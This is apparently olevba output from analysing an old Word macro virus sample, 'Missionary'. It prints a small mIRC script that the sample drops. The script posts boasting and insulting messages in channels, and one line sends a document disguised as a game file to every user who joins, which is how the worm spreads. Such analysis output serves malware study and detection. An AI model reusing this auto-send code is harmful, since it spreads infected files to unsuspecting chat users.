olevba 0.60.1.dev3 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: Virus.MSWord.Missionary-095ef40580bfaa623641cd19b6d76a49625f2d60
Type: Text
-------------------------------------------------------------------------------
VBA MACRO Virus.MSWord.Missionary-095ef40580bfaa623641cd19b6d76a49625f2d60 
in file: Virus.MSWord.Missionary-095ef40580bfaa623641cd19b6d76a49625f2d60 - OLE stream: ''
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[script]
n0=on 1:text:*virus*:#:/msg $chan Virii Rule
n1=on 1:text:*virus*:#:/join #vir | /amsg I am infected with Missionary virus by PhreakX
n2=on 1:text:*missionary*:#:/amsg I am infected with Missionary virus by PhreakX
n3=on 1:text:*turkey*:#:/msg $chan Turkey sucks
n4=on 1:join:#:/send $nick c:\mirc\backup\needforspeedIII.doc
No suspicious keyword or IOC found.

